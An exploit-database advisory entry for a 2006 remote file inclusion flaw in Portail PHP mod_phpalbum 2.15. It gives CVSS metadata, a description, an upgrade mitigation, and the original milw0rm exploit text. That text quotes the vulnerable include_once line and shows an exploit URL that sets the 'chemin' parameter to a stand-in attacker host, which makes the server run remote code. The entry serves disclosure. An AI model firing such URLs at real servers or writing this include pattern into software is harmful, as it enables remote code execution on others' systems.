Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion Vulnerabilities

vendor:

Portail PHP mod_phpalbum

by:

XORON

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Portail PHP mod_phpalbum

Affected Version From: 2.15

Affected Version To: 2.15

Patch Exists: YES

Related CWE: N/A

CPE: a:phpalbum:portail_php_mod_phpalbum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion Vulnerabilities

A remote file inclusion vulnerability exists in Portail PHP mod_phpalbum 2.15. An attacker can exploit this vulnerability to include arbitrary remote files by sending a specially crafted HTTP request containing directory traversal sequences and a malicious URL in the 'chemin' parameter to the 'sommaire_admin.php' script.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

############################################################

#Portail PHP mod_phpalbum 2.15  Modules Remote File Inclusion Vulnerabilities

############################################################

#Author: XORON

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:  include_once ($chemin."conf/code.php")

############################################################

#Exploit: http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA

############################################################

# milw0rm.com [2006-08-29]